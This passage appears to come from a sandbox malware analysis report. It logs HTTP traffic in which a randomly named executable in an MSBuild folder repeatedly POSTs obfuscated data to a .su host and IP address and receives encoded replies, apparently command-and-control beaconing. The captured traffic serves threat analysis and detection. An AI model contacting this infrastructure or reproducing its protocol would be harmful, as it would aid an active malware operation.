                                                                                      Data Ascii: Q^T_^\US^WZQW[PXT\T\V]WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9A,W&$&&-;?6Y$8')$W56<4' &,)/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:38.732381105 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      62192.168.2.44980791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:39.374428034 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:39.717653036 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:39.717894077 CET1872OUTData Raw: 54 5c 54 58 5b 5e 50 51 5e 57 5a 51 57 5e 50 58 54 56 54 52 56 5b 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T\TX[^PQ^WZQW^PXTVTRV[W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C,!%0#!05"^8,2_38?2*?!4T#<7Y34'1:,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:40.089755058 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:39 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 02 25 5d 2f 54 37 33 23 0d 3d 04 31 01 3d 0f 04 5b 2b 5e 22 05 3e 3f 3a 5c 3b 3a 24 56 3d 38 01 06 20 06 28 14 23 22 2f 0e 31 13 20 5c 05 11 24 03 33 31 22 02 30 03 36 02 24 21 36 03 26 01 09 06 2b 3b 2d 00 33 3a 38 03 22 33 2f 0f 26 2a 0d 12 26 3f 07 17 3a 2e 27 1c 26 17 2d 54 02 17 22 55 24 2d 34 5d 28 56 28 03 25 54 21 14 3d 03 23 0a 35 17 24 53 36 0d 0c 00 25 2b 2a 16 20 22 05 58 2b 3b 24 04 24 2c 3c 57 32 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-%]/T73#=1=[+^">?:\;:$V=8 (#"/1 \$31"06$!6&+;-3:8"3/&*&?:.'&-T"U$-4](V(%T!=#5$S6%+* "X+;$$,<W2.#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      63192.168.2.44980891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:39.496459007 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:39.842035055 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:39.842411041 CET2548OUTData Raw: 54 5f 54 5b 5b 5b 50 57 5e 57 5a 51 57 58 50 5b 54 5c 54 52 56 58 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_T[[[PW^WZQWXP[T\TRVXW_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,1133=]06;2381 V!;!0$71,=/%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:40.214409113 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      64192.168.2.44980991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:40.678903103 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:41.020140886 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:41.020387888 CET2548OUTData Raw: 51 5d 54 5e 5b 5c 55 54 5e 57 5a 51 57 5b 50 52 54 5c 54 52 56 5d 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]T^[\UT^WZQW[PRT\TRV]WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9,1!'U&36:_;Y>_082)0W55<#0B<2<=/9%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:41.388299942 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:41 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      65192.168.2.44981091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:41.857204914 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:42.202788115 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:42.203042030 CET2544OUTData Raw: 51 5d 51 59 5e 59 55 56 5e 57 5a 51 57 59 50 5d 54 52 54 5b 56 55 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]QY^YUV^WZQWYP]TRT[VUW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C,".V'U>0>-/&^08X1 "+54'B;^2[/%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:42.577083111 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      66192.168.2.44981191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:43.038794994 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:43.379976988 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:43.380249977 CET2548OUTData Raw: 54 5b 54 5d 5e 5c 55 5c 5e 57 5a 51 57 58 50 5a 54 56 54 5d 56 5d 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[T]^\U\^WZQWXPZTVT]V]W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/.%#136Y8/Y08'%)8V!$U!30'+\%<8)%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:43.748769999 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:43 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      67192.168.2.44981291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:44.216420889 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:44.562525034 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:44.562808990 CET2548OUTData Raw: 54 5b 51 5c 5e 5b 55 57 5e 57 5a 51 57 5c 50 53 54 57 54 5a 56 5f 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[Q\^[UW^WZQW\PSTWTZV_W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@,W:U' "0P",_'(%+"Z T5/_0;^1<.];%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:44.933567047 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      68192.168.2.44981491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:45.454027891 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:45.800508022 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:45.800812006 CET1872OUTData Raw: 51 59 51 5b 5e 5a 55 52 5e 57 5a 51 57 5a 50 5a 54 56 54 5f 56 5b 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYQ[^ZUR^WZQWZPZTVT_V[W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;1.U'"$%&_,*'#%3!?76//Y$' %<]/%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:46.174747944 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 58 32 05 0a 0d 23 0d 2c 16 3e 3d 00 59 3d 22 32 5e 2b 16 3e 07 28 2f 0c 5c 3b 39 38 55 28 2b 3c 1b 34 59 20 1a 23 31 28 55 25 13 20 5c 05 11 24 01 30 0c 21 58 27 03 29 59 30 08 36 03 26 11 01 09 2b 15 3e 13 24 39 0d 5d 23 55 24 52 25 3a 3c 02 24 2f 21 5e 2e 10 06 01 32 3d 2d 54 02 17 22 1e 25 3d 28 58 2b 30 30 01 32 0c 36 00 28 3e 3f 0f 22 29 0a 1f 35 33 0f 11 31 38 22 58 21 0c 34 00 3f 3b 28 00 30 02 06 50 26 04 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.X2#,>=Y="2^+>(/\;98U(+<4Y #1(U% \$0!X')Y06&+>$9]#U$R%:<$/!^.2=-T"%=(X+0026(>?")5318"X!4?;(0P&#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      69192.168.2.44981591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:45.568485975 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:45.909878969 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:45.910088062 CET2548OUTData Raw: 54 51 54 59 5b 5d 55 5c 5e 57 5a 51 57 5c 50 53 54 5c 54 59 56 5d 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQTY[]U\^WZQW\PST\TYV]W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;!23U"$6&;<"X'8'\2:'65<?_0X&?&\,%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:46.275571108 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      70192.168.2.44981691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:46.745827913 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:47.088721991 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:47.088987112 CET2548OUTData Raw: 51 59 51 5e 5e 5e 50 51 5e 57 5a 51 57 51 50 5d 54 53 54 53 56 5e 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYQ^^^PQ^WZQWQP]TSTSV^W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B81"W$#\$/3Z19#!4P5?/Y3781,"[,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:47.457406044 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:47 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      71192.168.2.44981791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:47.917309046 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:48.262315989 CET2548OUTData Raw: 54 5e 51 5b 5b 58 55 54 5e 57 5a 51 57 5c 50 59 54 51 54 58 56 54 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q[[XUT^WZQW\PYTQTXVTW\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E,-3)[$:,?>0?&9<P!"?]'(%/%,%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:48.262454033 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:48.636464119 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:48 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      72192.168.2.44981891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:49.106528997 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:49.451417923 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:49.451735020 CET2548OUTData Raw: 54 5e 54 5a 5e 5c 55 52 5e 57 5a 51 57 51 50 53 54 53 54 5a 56 59 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^TZ^\UR^WZQWQPSTSTZVYW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@8*$#Z$;&_$8?\2)+!,$"+^3''X2&/)%Z"!Q*
                                                                                      Mar 6, 2024 09:53:49.826376915 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
